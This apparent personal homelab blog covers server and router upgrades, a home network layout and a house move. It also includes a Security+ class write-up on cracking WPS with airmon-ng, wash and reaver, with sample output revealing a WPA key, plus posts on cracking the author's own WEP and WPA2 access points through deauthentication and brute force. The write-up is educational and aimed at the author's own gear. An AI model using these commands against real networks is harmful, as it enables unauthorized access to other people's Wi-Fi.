Two Years

Alot has changed since I last posted here,

Back then I was running the server on a 4 core with 8GB ram, the network relied on a SOHO off the shelf router.

Since then my network has gone threw a number of changes:

The main server was upgraded to a Dual CPU 6 core Xeon with 128 GB ram, I made the switch last year around this time to ZFS as my primary storage file system and wont ever look back at mdadm.

I had went through and made ‘compile cluster’ of three Gen 1 Raspberry pis running Gentoo, these ran relatively well but I never found a use for them outside of running AI battles of freeciv.

The above compile cluster was recently returned from the dead with a new batch of Gen 3 Pis all running 64 bit kernels. Two sit headless on a shelf operating my radius, dns and local ntp services, the third is my current workstation, and their shared portage repo. I also run Gentoo in a vm on the server ready to cross compile as needed.

The SOHO router started to over heat and shutdown, this was in the middle of a week I was working from home, I had just recently gotten the new server online and still had the ‘bones’ of the old one, Since then I have ran a few roll your own router distros:

4 core 8GB:
IPcop
*pfsense wouldn’t boot
IPFire, longest and most stable for this run ran for more then a year without problems.

I also tested switching From my tried and true KVM to ESX as school would provide it for a year. After a month I changed back, ESX seemed slow on my hardware for all my Linux machines but seemed much more optimized for windows, to bad I don’t run windows.. I did how ever get Mac OSX to install.

Around six months or so ago, my wife’s father happened on a rack system that was getting tossed, the gentleman who ran it passed away and his wife knew nothing about it and just wanted it gone, he asked if I wanted it.

From that I acquired:
42U Rack
Powerconnect 5448 48+4 port switch
Supermicro ‘NAS’ server 4 core Xeon with 8GB ram (Upgraded to 32GB) with 16 2TB drives
i5 with 16GB ram

Dual Core AMD, cant remember the ram as I haven’t used it.

Since then I racked My Dual Xeon and the router, after having issues with the 4 core router, I decided to upgrade to the i5 For a router. as When I went to the ‘roll your own’ I started down the squid(av,cache), snort, etc.. route and it eats alot of ram if you let it.

i5 16GB:
IPfire again long run until a friend at work showed me..
PFsense, would run for a few weeks then suddenly loose wan/route and i couldn’t get it back without re installing this lead to going back to.
IPFire, around this time 114 was out and both the installer and upgrader had issues I decided to check out
OPNsense and have run it ever since.

Everything racked from top down:

Switch
Dual Xeon
Router
SPACE
Supermicro Nas (on the bottom)

Network topology changed aswell, given now with the ‘roll your own’ distros I can have completely separate networks I have and mainly for now kept with the IPFire schema:

LAN, for everything Wired
Wireless, Selfexplanitory
L I have three access points in the house now, the original 1750AC a gifted 1900AC
both running as access points WPA-Enterprise, using the PIs radius for auth, then
an old 600n for legacy WPA2 with a direct line to the internet and nothing else.
Excom, Servers and such

LAN can access anything and any of the three networks, but both Wireless and Excom(unicated) can only talk to the internet and themselves.

For now I will leave this as my update.

Server Migration and Wireless Fun

Having moved, the server and entire infrastructure had to be moved and adapted to the new home.

A day before we officially moved, I shutdown the server and took it to its new home, having internet service setup the week prior I connected the primary router, which had held fast the setting I had set up, connected the server and things worked. I hit the WAN IP, I saw the server, all I needed to do was update DNS and I was golden.

The new house unlike the old seems to have more of an issue with Wifi connectivity as I have a 1750AC router with 12db antennas in the basement with the server same as the old house, on the main floor though now the signal is halved what it used to be.

Nice thing is this house came pre-wired with Ethernet in nearly every room, including what the previous owners turned from a closet into a hide able computer/work desk area, this allowed me to pipe from the basement router to a converted router now access point on the main floor, also supplying a hub from the single wall jack for what ever I want to hard line.

Now I only need to put one on the third floor as it’s the same with the first two, signal on the third is strained at best.

Time will tell how many Access point I end up needing, Its been to cold to try sitting out on the back deck with a PC/Laptop.

Attacking WPS

This is a Write up I did for my Security + Class on Attacking WPS on newer Wireless routers, If you do anything in this tutorial I would suggest using your own equipment as i don’t condone Hacking 😉

 

Basis of Cracking WPS enabled Router,

Start Monitor mode on Wireless Card,

sudo airmon-ng start wlan0

This creates a monitoring interface call ‘mon0’, needed for later

now to scan for WPS enabled Routers we need a program call wash, this comes with the WPS cracking suite named reaver from version 1.4 and up

sudo wash -i mon0

This may give you the ‘[!] Found packet with bad FCS, skipping…’ error to ignore these execute the command above with -C as in..

sudo wash -i mon0 -C

The -i is for interface here we use mon0

This will in turn grant you all the WPS enable routers, there BSSID(MAC), SSID(Name), Channel, RSSI(signal strength) WPS Version and WPS Locked

I have yet to run into any version above 1.0 and never one that was locked

It looks like this:

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:21:29:CA:DF:A0 11 -34 1.0 No Hack ME

Once we have this information we can move on to starting to crack the Access Point through WPS, jot down the BSSID(MAC)

Now we start with reaver

sudo reaver -i mon1 -b 00:21:29:CA:DF:A0 -vv

here again we will use the -i for interface and mon0, the -b is for BSSID and we place the MAC there so reaver knows what to attack, the -vv is very verbose, it tells us EVERYTHING its doing

At this point reaver will begin to guess pins against

Now before we go further I will explain how reaver ‘guesses’ the pin, a flaw in the WPS design is it can be broken into two peices where the key is eight digits we’ll say 12345670,

The first four can be guessed against the router seperately then the second half there by taking one hundred thousand guesses down to ten thousand for the first half,

The second half is actually only three digits and a checksum digit on the end so the second half only needs to guess one thousand as it will calculate the checksum automagicly, now some router will time out after so many guesses sadly not a well known vender *CoughLINKSYScough*
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:21:29:CA:DF:A0
[+] Switching mon1 to channel 11
[+] Associated with 00:21:29:CA:DF:A0 (ESSID: Hack ME)
[+] Trying pin 02075679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
After guessing for a long time you will eventually get the key and it will look something like this
[+] Trying pin 00000000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 128 seconds
[+] WPS PIN: ‘00000000’
[+] WPA PSK: ‘Th1s1550n0Tw0r4hitItsNotFunny’
[+] AP SSID: ‘Hack ME’

First this was cracked in such a short ammount of time because I passed reaver the pin instead of waiting but this is what it looks like when it finds it by it self as well,

The WPA PSK is the WPA 1 or 2 Password, yes reavealed

Enjoy!

I Tipped my King in the Wrong Direction..

So after guessing over 1 million passwords in 15 hours I decided to install backtrack on the desktop and let it whack at it instead.. it has a higher grade CPU 3.2 dual core compared to 2.0 dual, more memory 6 gb compared to 4 gb but the weirdest thing is its actually doing a lot worse!

Where the laptop was running anywhere from 500 hashes on power saver to 1000+ on performance the desktop it only doing roughly 333-345 at full boat

I’ll look into it more tommorow but hopefully this isn’t a trend..

Tipping the Black Hat, with Backtrack 5

Today I played with Backtrack 5 and “penatration tested” ,a buisness friendly way of saying hacked, my own Wireless Access Points I set one up as WEP and the other as WPA2 personal, the wep was done within about 15 minutes and it only took that long because I let it grab 30,000+ packets first, once I set down for the password it was done in seconds, the WPA I set up and deauthed my android cellphones wifi connection making it handshake a few times, the dictionary hack is still running, should this not work ill fall back to straight brute force

 

EDIT: As of 4 am the next morning the computer had cycled the entire dictionary with no luck, I set it up to use “John the Ripper” to bruteforce the password out, this started at 4:38 am, should it finish or not I’ll post back